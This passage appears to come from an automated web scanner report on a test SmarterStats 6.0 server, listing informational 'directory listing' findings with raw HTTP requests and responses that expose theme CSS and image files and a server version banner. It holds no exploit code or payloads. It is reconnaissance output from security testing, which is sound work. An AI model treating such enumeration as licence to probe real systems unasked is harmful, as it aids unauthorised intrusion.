Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Common/

Request

GET /App_Themes/Default/Controls/Common/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:05 GMT
Content-Length: 1507
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Common/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Common/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 14,786 <A href="DialogBase.css">DialogBase.css</A>
Thursday, October 07, 2010 01:00 PM 10,092 <A href="FileManager.css">FileManager.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.28. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Editor/

Request

GET /App_Themes/Default/Controls/Editor/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:03 GMT
Content-Length: 1876
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Editor/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Editor/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 358 <A href="Dialogs.css">Dialogs.css</A>
Thursday, October 07, 2010 01:00 PM 12,414 <A href="Editor.css">Editor.css</A>
Thursday, October 07, 2010 01:00 PM 27,830 <A href="EditorBase.css">EditorBase.css</A>
Thursday, October 07, 2010 01:00 PM 1,112 <A href="EditorContentArea.css">EditorContentArea.css</A>
Thursday, October 07, 2010 01:00 PM 335 <A href="EditorIE6.css">EditorIE6.css</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.29. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Editor/Img/

Request

GET /App_Themes/Default/Controls/Editor/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:04 GMT
Content-Length: 4051
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Editor/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Editor/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Editor/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 127 <A href="ButtonHover_Horizontal.gif">ButtonHover_Horizontal.gif</A>
Thursday, October 07, 2010 01:00 PM 484 <A href="ButtonHover_Vertical.gif">ButtonHover_Vertical.gif</A>
Thursday, October 07, 2010 01:00 PM 149 <A href="ButtonOn_Horizontal.gif">ButtonOn_Horizontal.gif</A>
Thursday, October 07, 2010 01:00 PM 443 <A href="ButtonOn_Vertical.gif">ButtonOn_Vertical.gif</A>
Thursday, October 07, 2010 01:00 PM 143 <A href="ComboArrow.gif">ComboArrow.gif</A>
Thursday, October 07, 2010 01:00 PM 36,404 <A href="CommandSpritesLight.png">CommandSpritesLight.png</A>
Thursday, October 07, 2010 01:00 PM 17,913 <A href="CommandSpritesLightIE6.gif">CommandSpritesLightIE6.gif</A>
Thursday, October 07, 2010 01:00 PM 3,057 <A href="CommonIcons.gif">CommonIcons.gif</A>
Thursday, October 07, 2010 01:00 PM 6,344 <A href="FileExplorerToolbarSprites.png">FileExplorerToolbarSprites.png</A>
Thursday, October 07, 2010 01:00 PM 3,698 <A href="FileExplorerToolbarSpritesIE6.gif">FileExplorerToolbarSpritesIE6.gif</A>
Thursday, October 07, 2010 01:00 PM 11,589 <A href="FileExtensionSprites.png">FileExtensionSprites.png</A>
Thursday, October 07, 2010 01:00 PM 9,244 <A href="FileExtensionSpritesIE6.gif">FileExtensionSpritesIE6.gif</A>
Thursday, October 07, 2010 01:00 PM 520 <A href="FormatStripperSprites.gif">FormatStripperSprites.gif</A>
Thursday, October 07, 2010 01:00 PM 207 <A href="GripHandle_Horizontal_Left.gif">GripHandle_Horizontal_Left.gif</A>
Thursday, October 07, 2010 01:00 PM 207 <A href="GripHandle_Horizontal_Right.gif">GripHandle_Horizontal_Right.gif</A>
Thursday, October 07, 2010 01:00 PM 518 <A href="GripHandle_Vertical_Left.gif">GripHandle_Vertical_Left.gif</A>
Thursday, October 07, 2010 01:00 PM 518 <A href="GripHandle_Vertical_Right.gif">GripHandle_Vertical_Right.gif</A>
Thursday, October 07, 2010 01:00 PM 2,392 <A href="InsertFormElementSprites.gif">InsertFormElementSprites.gif</A>
Thursday, October 07, 2010 01:00 PM 46 <A href="SplitButtonArrow.gif">SplitButtonArrow.gif</A>
Thursday, October 07, 2010 01:00 PM 198 <A href="ToolbarBgr_Horizontal.gif">ToolbarBgr_Horizontal.gif</A>
Thursday, October 07, 2010 01:00 PM 502 <A href="ToolbarBgr_Vertical.gif">ToolbarBgr_Vertical.gif</A>
Thursday, October 07, 2010 01:00 PM 3,601 <A href="ToolBarSprites.gif">ToolBarSprites.gif</A>
Thursday, October 07, 2010 01:00 PM 3,704 <A href="ToolbarVerticalSprites.gif">ToolbarVerticalSprites.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.30. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Grid/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Grid/

Request

GET /App_Themes/Default/Controls/Grid/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:06 GMT
Content-Length: 1485
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Grid/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Grid/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 15,603 <A href="Grid.css">Grid.css</A>
Thursday, October 07, 2010 01:00 PM 13 <A href="GridBase.css">GridBase.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.31. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Input/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Input/

Request

GET /App_Themes/Default/Controls/Input/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:08 GMT
Content-Length: 1398
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Input/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Input/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 609 <A href="styles.css">styles.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.32. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Spell/

Request

GET /App_Themes/Default/Controls/Spell/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:09 GMT
Content-Length: 1589
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Spell/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Spell/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
Thursday, October 07, 2010 01:00 PM 4,102 <A href="RadSpell.css">RadSpell.css</A>
Thursday, October 07, 2010 01:00 PM 0 <A href="RadSpellCommon.css">RadSpellCommon.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.33. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Spell/Img/

Request

GET /App_Themes/Default/Controls/Spell/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:11 GMT
Content-Length: 1854
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Spell/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Spell/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Spell/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,162 <A href="spellButtonCombined.gif">spellButtonCombined.gif</A>
Thursday, October 07, 2010 01:00 PM 67 <A href="spellHeadLeft.gif">spellHeadLeft.gif</A>
Thursday, October 07, 2010 01:00 PM 59 <A href="spellHeadMiddle.gif">spellHeadMiddle.gif</A>
Thursday, October 07, 2010 01:00 PM 76 <A href="spellHeadRight.gif">spellHeadRight.gif</A>
Thursday, October 07, 2010 01:00 PM 55 <A href="spellWinBack.gif">spellWinBack.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.34. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/TabStrip/

Request

GET /App_Themes/Default/Controls/TabStrip/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:16 GMT
Content-Length: 1591
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/TabStrip/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/TabStrip/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
Thursday, October 07, 2010 01:00 PM 1,194 <A href="TabStrip.css">TabStrip.css</A>
Thursday, October 07, 2010 01:00 PM 4,711 <A href="TabStripBase.css">TabStripBase.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.35. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/TabStrip/Img/

Request

GET /App_Themes/Default/Controls/TabStrip/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:17 GMT
Content-Length: 1724
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/TabStrip/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/TabStrip/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/TabStrip/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 861 <A href="tabBar_tile.png">tabBar_tile.png</A>
Thursday, October 07, 2010 01:00 PM 98 <A href="tab_leftcap.png">tab_leftcap.png</A>
Thursday, October 07, 2010 01:00 PM 98 <A href="tab_rightcap.png">tab_rightcap.png</A>
Thursday, October 07, 2010 01:00 PM 689 <A href="tab_tile.png">tab_tile.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.36. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Toolbar/

Request

GET /App_Themes/Default/Controls/Toolbar/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:24 GMT
Content-Length: 1585
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Toolbar/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Toolbar/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Img/">Img</A>
Thursday, October 07, 2010 01:00 PM 6,588 <A href="Toolbar.css">Toolbar.css</A>
Thursday, October 07, 2010 01:00 PM 10,411 <A href="ToolbarBase.css">ToolbarBase.css</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.37. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/Img/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Toolbar/Img/

Request

GET /App_Themes/Default/Controls/Toolbar/Img/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:24 GMT
Content-Length: 2094
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Toolbar/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Controls/Toolbar/Img/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Controls/Toolbar/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 558 <A href="ToolbarBgH.gif">ToolbarBgH.gif</A>
Thursday, October 07, 2010 01:00 PM 599 <A href="ToolbarBgV.gif">ToolbarBgV.gif</A>
Thursday, October 07, 2010 01:00 PM 1,982 <A href="ToolbarItemActive.gif">ToolbarItemActive.gif</A>
Thursday, October 07, 2010 01:00 PM 2,248 <A href="ToolbarItemHover.gif">ToolbarItemHover.gif</A>
Thursday, October 07, 2010 01:00 PM 2,189 <A href="ToolbarSplButActive.gif">ToolbarSplButActive.gif</A>
Thursday, October 07, 2010 01:00 PM 2,427 <A href="ToolbarSplButHover.gif">ToolbarSplButHover.gif</A>
Thursday, October 07, 2010 01:00 PM 115 <A href="ToolbarSplitButtonArrow.gif">ToolbarSplitButtonArrow.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.38. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Controls/Window/

Request

GET /App_Themes/Default/Controls/Window/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:33 GMT
Content-Length: 1667
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
